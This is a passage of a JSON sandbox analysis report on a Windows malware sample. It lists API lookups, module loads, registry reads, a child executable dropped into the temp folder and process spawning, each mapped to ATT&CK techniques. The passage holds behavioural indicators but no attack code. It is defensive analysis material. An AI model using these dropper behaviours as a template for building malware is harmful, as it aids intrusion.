\"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004920)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da592076@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03e0b6a@ADVAPI32.dll\"\n \"0e000f00703f0b6a@ADVAPI32.dll\"\n \"0e000f00cc3f0b6a@ADVAPI32.dll\"\n \"11001200b4470b6a@ADVAPI32.dll\"\n \"1100120048480b6a@ADVAPI32.dll\"\n \"120013008c480b6a@ADVAPI32.dll\"\n \"12001300e4480b6a@ADVAPI32.dll\"\n \"14001500386e0b6a@ADVAPI32.dll\"\n \"14001500506e0b6a@ADVAPI32.dll\"\n \"14001500686e0b6a@ADVAPI32.dll\"\n \"17001800806e0b6a@ADVAPI32.dll\"\n \"0d000e00986e0b6a@ADVAPI32.dll\"\n \"11001200a86e0b6a@ADVAPI32.dll\"\n \"11001200bc6e0b6a@ADVAPI32.dll\"\n \"0d000e0044660b6a@WININET.dll\"\n \"0d000e00b4660b6a@WININET.dll\"\n \"10001100ec660b6a@WININET.dll\"\n \"1000110090670b6a@WININET.dll\"\n \"10001100006f0b6a@WININET.dll\"\n \"10001100146f0b6a@WININET.dll\"\n \"14001500286f0b6a@WININET.dll\"\n \"14001500406f0b6a@WININET.dll\"\n \"12001300586f0b6a@WININET.dll\"\n \"120013006c6f0b6a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"CreateProcessW\" with parameter \":*C:\\91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe *\" - (UID: 00000000-00004572)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZWVYXG\" - (UID: 00000000-00003412)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75120000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c40000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 774e0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c490000\n \"085cda53603755dc.exe\" loaded module \"KERNEL32.DLL\" at base 774e0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75120000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 74fb0000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 75f00000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 764a0000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75280000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71430000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75340000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 758f0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F00000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F00000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004920)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004920)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has an writable section named \".data\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has an writable section named \".bss\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has an writable section named \".idata\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has an writable section named \".CRT\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has an writable section named \".tls\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c286 ...\" (UID: 00000000-00003412)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZWVYXG\" (UID: 00000000-00004920)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c286 ...\" (UID: 00000000-00003412)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZWVYXG\" (UID: 00000000-00004920)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" was detected as \"MinGW\" and name: \"Compiler\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004920]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VERSION.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" reads file \"c:\\91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\version.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": 